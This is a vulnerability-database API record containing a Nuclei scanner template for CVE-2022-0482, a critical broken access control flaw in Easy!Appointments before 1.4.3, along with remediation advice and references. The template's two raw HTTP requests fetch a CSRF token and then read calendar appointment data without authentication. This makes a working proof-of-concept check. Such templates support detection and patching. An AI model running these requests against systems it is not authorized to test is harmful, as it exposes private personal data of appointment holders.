{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2022-0482/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2022-0482/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2022-0482/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2022-0482/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2022-0482/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2022-0482"},"sightings":{"href":"/api/v1/sightings/cve-2022-0482"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2022/CVE-2022-0482.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2022-0482\n\ninfo:\n  name: Easy!Appointments <1.4.3 - Broken Access Control\n  author: francescocarlucci,opencirt\n  severity: critical\n  description: |\n    Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments.\n  impact: |\n    An attacker can exploit this vulnerability to gain unauthorized access to sensitive data or perform unauthorized actions.\n  remediation: |\n    Upgrade Easy!Appointments to version 1.4.4 or above to fix the Broken Access Control vulnerability.\n  reference:\n    - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/\n    - https://github.com/alextselegidis/easyappointments\n    - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-0482\n    - https://github.com/alextselegidis/easyappointments/commit/44af526a6fc5e898bc1e0132b2af9eb3a9b2c466\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 9.1\n    cve-id: CVE-2022-0482\n    cwe-id: CWE-359,CWE-863\n    epss-score: 0.43746\n    epss-percentile: 0.98697\n    cpe: cpe:2.3:a:easyappointments:easyappointments:*:*:*:*:*:wordpress:*:*\n  metadata:\n    max-request: 2\n    vendor: easyappointments\n    product: easyappointments\n    framework: wordpress\n  tags: cve,cve2022,easyappointments,huntr,wordpress,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n      - |\n        POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n        csrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"appointments\":'\n          - '\"unavailability_events\":'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: kval\n        name: csrf_token\n        internal: true\n        kval:\n          - \"csrfCookie\"\n        part: header\n# digest: 4b0a00483046022100a6ae8ed3e8486c9e91ef8e6a78b3afa41be57c6afcaff6fea5ddd2cf0c430bc6022100847871fe7390c9e75a3c62578a52f5e5c642b09cf833aaa0bb42350652de5592:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2022-0482"}